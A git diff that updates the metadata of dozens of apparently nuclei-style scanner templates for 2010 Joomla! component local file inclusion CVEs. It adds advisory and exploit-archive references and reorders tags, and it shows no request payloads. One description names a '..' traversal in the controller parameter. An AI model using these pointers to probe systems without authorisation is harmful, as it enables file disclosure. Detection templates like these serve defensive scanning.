+ tags: joomla,lfi,edb,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml
index 32449fabe6..26928f9d4d 100644
--- a/cves/2010/CVE-2010-1306.yaml
+++ b/cves/2010/CVE-2010-1306.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
+ - http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/
+ - http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1306
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml
index 8d4c18d51d..cf39fdc2b2 100644
--- a/cves/2010/CVE-2010-1307.yaml
+++ b/cves/2010/CVE-2010-1307.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
+ - http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/
+ - http://www.vupen.com/english/advisories/2010/0806
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1307
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml
index 3683a2bc44..909c451b53 100644
--- a/cves/2010/CVE-2010-1308.yaml
+++ b/cves/2010/CVE-2010-1308.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308
+ - http://www.vupen.com/english/advisories/2010/0809
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1308
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml
index 34c39e2ec6..059b64aa78 100644
--- a/cves/2010/CVE-2010-1312.yaml
+++ b/cves/2010/CVE-2010-1312.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
+ - http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/
+ - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1312
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml
index 1b865aa5ac..c0d27ee8d3 100644
--- a/cves/2010/CVE-2010-1313.yaml
+++ b/cves/2010/CVE-2010-1313.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
+ - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
+ - http://www.exploit-db.com/exploits/12082
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1313
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml
index 7face0dddc..3958192d98 100644
--- a/cves/2010/CVE-2010-1314.yaml
+++ b/cves/2010/CVE-2010-1314.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
+ - http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/
+ - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1314
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml
index e54b204b14..de359df4af 100644
--- a/cves/2010/CVE-2010-1315.yaml
+++ b/cves/2010/CVE-2010-1315.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315
+ - http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/
+ - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1315
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml
index 8d26fdb4e2..e97e612947 100644
--- a/cves/2010/CVE-2010-1340.yaml
+++ b/cves/2010/CVE-2010-1340.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
+ - http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/
+ - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1340
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml
index 4e3a6a9979..fa6ee67ced 100644
--- a/cves/2010/CVE-2010-1345.yaml
+++ b/cves/2010/CVE-2010-1345.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345
+ - http://www.exploit-db.com/exploits/11785
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1345
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml
index d41d6ffb05..af0680717a 100644
--- a/cves/2010/CVE-2010-1352.yaml
+++ b/cves/2010/CVE-2010-1352.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12084
- https://www.cvedetails.com/cve/CVE-2010-1352
+ - http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/
+ - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1352
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml
index 3523896e82..73fb8f0020 100644
--- a/cves/2010/CVE-2010-1353.yaml
+++ b/cves/2010/CVE-2010-1353.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
+ - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/
+ - http://www.vupen.com/english/advisories/2010/0808
classification:
cve-id: CVE-2010-1353
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml
index f74519761c..aeef172960 100644
--- a/cves/2010/CVE-2010-1354.yaml
+++ b/cves/2010/CVE-2010-1354.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
+ - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt
+ - http://web.archive.org/web/20140724190841/http://secunia.com/advisories/39296/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1354
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml
index 7f56edc715..0c6bf1782f 100644
--- a/cves/2010/CVE-2010-1461.yaml
+++ b/cves/2010/CVE-2010-1461.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
+ - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504
+ - http://www.exploit-db.com/exploits/12232
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1461
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi,photo
+ tags: cve,cve2010,joomla,lfi,photo,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml
index 5489b65613..be491b5e73 100644
--- a/cves/2010/CVE-2010-1469.yaml
+++ b/cves/2010/CVE-2010-1469.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
+ - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt
+ - http://www.exploit-db.com/exploits/12146
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1469
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml
index d1f197f51e..1d6450b1b8 100644
--- a/cves/2010/CVE-2010-1470.yaml
+++ b/cves/2010/CVE-2010-1470.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
+ - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/
+ - http://www.exploit-db.com/exploits/12166
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1470
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml
index 2a6b8c6404..0d9df245c0 100644
--- a/cves/2010/CVE-2010-1471.yaml
+++ b/cves/2010/CVE-2010-1471.yaml
@@ -8,10 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471
+ - http://www.vupen.com/english/advisories/2010/0862
classification:
cve-id: CVE-2010-1471
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml
index a995b37bb1..a69ad87305 100644
--- a/cves/2010/CVE-2010-1472.yaml
+++ b/cves/2010/CVE-2010-1472.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472
+ - http://web.archive.org/web/20140723200143/http://secunia.com/advisories/39406/
+ - http://www.exploit-db.com/exploits/12167
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1472
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml
index ab6af01c75..7d81133c22 100644
--- a/cves/2010/CVE-2010-1473.yaml
+++ b/cves/2010/CVE-2010-1473.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473
+ - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
+ - http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1473
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,packetstorm,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml
index 3eb57c4788..ebce5060fb 100644
--- a/cves/2010/CVE-2010-1474.yaml
+++ b/cves/2010/CVE-2010-1474.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
+ - http://web.archive.org/web/20140723205926/http://secunia.com/advisories/39388/
+ - http://www.exploit-db.com/exploits/12182
classification:
cve-id: CVE-2010-1474
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml
index c3148da86e..9d5ab44333 100644
--- a/cves/2010/CVE-2010-1475.yaml
+++ b/cves/2010/CVE-2010-1475.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
+ - http://web.archive.org/web/20140723203010/http://secunia.com/advisories/39285/
+ - http://www.exploit-db.com/exploits/12147
classification:
cve-id: CVE-2010-1475
- tags: cve,cve2010,joomla,lfi
+ tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml
index d9f1db1f23..1ae3498a34 100644
--- a/cves/2010/CVE-2010-1476.yaml
+++ b/cves/2010/CVE-2010-1476.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12150
- https://www.cvedetails.com/cve/CVE-2010-1476
+ - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt
+ - http://www.alphaplug.com/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1476
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,packetstorm,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml
index b88ddc77a7..1d8de53169 100644
--- a/cves/2010/CVE-2010-1478.yaml
+++ b/cves/2010/CVE-2010-1478.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478
+ - http://web.archive.org/web/20140723205157/http://secunia.com/advisories/39262/
+ - http://web.archive.org/web/20210121195422/https://www.securityfocus.com/bid/39390/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1478
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml
index 713e23b779..3640e1e37a 100644
--- a/cves/2010/CVE-2010-1491.yaml
+++ b/cves/2010/CVE-2010-1491.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491
+ - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt
+ - http://web.archive.org/web/20140724060325/http://secunia.com/advisories/39533/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1491
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml
index 2060b98972..d8a96ed10f 100644
--- a/cves/2010/CVE-2010-1494.yaml
+++ b/cves/2010/CVE-2010-1494.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12113
- https://www.cvedetails.com/cve/CVE-2010-1494
+ - http://www.exploit-db.com/exploits/12113
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1494
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml
index 622f71cfea..6e28f8a4fe 100644
--- a/cves/2010/CVE-2010-1495.yaml
+++ b/cves/2010/CVE-2010-1495.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495
+ - http://www.vupen.com/english/advisories/2010/0929
+ - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1495
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml
index 7741ecdb85..6a0cba1da4 100644
--- a/cves/2010/CVE-2010-1531.yaml
+++ b/cves/2010/CVE-2010-1531.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12054
- https://www.cvedetails.com/cve/CVE-2010-1531
+ - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1531
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml
index cd68c205e5..3cfdb1c33b 100644
--- a/cves/2010/CVE-2010-1532.yaml
+++ b/cves/2010/CVE-2010-1532.yaml
@@ -4,15 +4,16 @@ info:
name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
author: daffainfo
severity: high
- description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts
- via a .. (dot dot) in the controller parameter to index.php.
+ description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12118
- https://www.cvedetails.com/cve/CVE-2010-1532
+ - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt
+ - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1532
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1533.yaml b/cves/2010/CVE-2010-1533.yaml
index 3c56311b21..50a833080d 100644
--- a/cves/2010/CVE-2010-1533.yaml
+++ b/cves/2010/CVE-2010-1533.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12142
- https://www.cvedetails.com/cve/CVE-2010-1533
+ - http://web.archive.org/web/20140723212810/http://secunia.com/advisories/39258/
+ - http://www.exploit-db.com/exploits/12142
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1533
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml
index 721940176f..a7222cf33b 100644
--- a/cves/2010/CVE-2010-1534.yaml
+++ b/cves/2010/CVE-2010-1534.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12067
- https://www.cvedetails.com/cve/CVE-2010-1534
+ - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39213/
+ - http://web.archive.org/web/20140724182459/http://secunia.com/advisories/39352/
+ remediation: Upgrade to a supported version
classification:
cve-id: CVE-2010-1534
- remediation: Upgrade to a supported version
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml
index 06d7154eb4..dd182e49a7 100644
--- a/cves/2010/CVE-2010-1535.yaml
+++ b/cves/2010/CVE-2010-1535.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12151
- https://www.cvedetails.com/cve/CVE-2010-1535
+ - http://web.archive.org/web/20140725030342/http://secunia.com/advisories/39254/
+ - http://www.exploit-db.com/exploits/12151
classification:
cve-id: CVE-2010-1535
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml
index afd61d4b4d..7858f54cb4 100644
--- a/cves/2010/CVE-2010-1540.yaml
+++ b/cves/2010/CVE-2010-1540.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
+ - http://web.archive.org/web/20140721042709/http://secunia.com/advisories/38777/
+ - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/
classification:
cve-id: CVE-2010-1540
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml
index ca4fbf66c0..b02548d3dd 100644
--- a/cves/2010/CVE-2010-1601.yaml
+++ b/cves/2010/CVE-2010-1601.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
+ - http://web.archive.org/web/20140803084823/http://secunia.com/advisories/39472/
+ - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt
classification:
cve-id: CVE-2010-1601
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml
index 63a8d37726..7ea5cac135 100644
--- a/cves/2010/CVE-2010-1602.yaml
+++ b/cves/2010/CVE-2010-1602.yaml
@@ -8,9 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
+ - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt
classification:
cve-id: CVE-2010-1602
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1603.yaml b/cves/2010/CVE-2010-1603.yaml
index 962fe63461..cea0d41ac0 100644
--- a/cves/2010/CVE-2010-1603.yaml
+++ b/cves/2010/CVE-2010-1603.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12284
- https://www.cvedetails.com/cve/CVE-2010-1603
+ - http://web.archive.org/web/20210518112730/https://www.securityfocus.com/bid/39546
+ - http://www.vupen.com/english/advisories/2010/0931
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1603
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml
index 91f7796f72..434bfacdfe 100644
--- a/cves/2010/CVE-2010-1607.yaml
+++ b/cves/2010/CVE-2010-1607.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
+ - http://web.archive.org/web/20210121195713/https://www.securityfocus.com/bid/39608/
+ - http://web.archive.org/web/20111227231442/http://secunia.com/advisories/39539/
classification:
cve-id: CVE-2010-1607
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1653.yaml b/cves/2010/CVE-2010-1653.yaml
index 584e220b6b..eefedff98e 100644
--- a/cves/2010/CVE-2010-1653.yaml
+++ b/cves/2010/CVE-2010-1653.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12430
- https://www.cvedetails.com/cve/CVE-2010-1653
+ - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt
+ - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/
classification:
cve-id: CVE-2010-1653
- tags: cve,cve2010,joomla,lfi
+ tags: edb,packetstorm,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1657.yaml b/cves/2010/CVE-2010-1657.yaml
index 7a227fe4f2..ca854101b6 100644
--- a/cves/2010/CVE-2010-1657.yaml
+++ b/cves/2010/CVE-2010-1657.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1657
- https://www.exploit-db.com/exploits/12428
+ - http://www.vupen.com/english/advisories/2010/1006
+ - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39740/
classification:
cve-id: CVE-2010-1657
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1658.yaml b/cves/2010/CVE-2010-1658.yaml
index cf60ccf129..c2c6ba0371 100644
--- a/cves/2010/CVE-2010-1658.yaml
+++ b/cves/2010/CVE-2010-1658.yaml
@@ -8,9 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
+ - http://www.vupen.com/english/advisories/2010/1007
classification:
cve-id: CVE-2010-1658
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1659.yaml b/cves/2010/CVE-2010-1659.yaml
index 3d326d3d79..92c469cc49 100644
--- a/cves/2010/CVE-2010-1659.yaml
+++ b/cves/2010/CVE-2010-1659.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12426
- https://nvd.nist.gov/vuln/detail/CVE-2010-1659
+ - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39739/
+ - http://www.exploit-db.com/exploits/12426
classification:
cve-id: CVE-2010-1659
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml
index 573ea301b2..b088feba43 100644
--- a/cves/2010/CVE-2010-1714.yaml
+++ b/cves/2010/CVE-2010-1714.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12168
- https://www.cvedetails.com/cve/CVE-2010-1714
+ - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt
+ - http://web.archive.org/web/20140723192327/http://secunia.com/advisories/39413/
classification:
cve-id: CVE-2010-1714
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml
index 96a7921454..b991fb91dc 100644
--- a/cves/2010/CVE-2010-1715.yaml
+++ b/cves/2010/CVE-2010-1715.yaml
@@ -8,9 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
+ - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt
classification:
cve-id: CVE-2010-1715
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,packetstorm,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1717.yaml b/cves/2010/CVE-2010-1717.yaml
index 0d73b37fcc..3d72e3973f 100644
--- a/cves/2010/CVE-2010-1717.yaml
+++ b/cves/2010/CVE-2010-1717.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
+ - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/
+ - http://www.vupen.com/english/advisories/2010/0924
classification:
cve-id: CVE-2010-1717
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1718.yaml b/cves/2010/CVE-2010-1718.yaml
index 8127f88b49..a70b5e7b3f 100644
--- a/cves/2010/CVE-2010-1718.yaml
+++ b/cves/2010/CVE-2010-1718.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12282
- https://www.cvedetails.com/cve/CVE-2010-1718
+ - http://web.archive.org/web/20140805094212/http://secunia.com/advisories/39521/
+ - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/
classification:
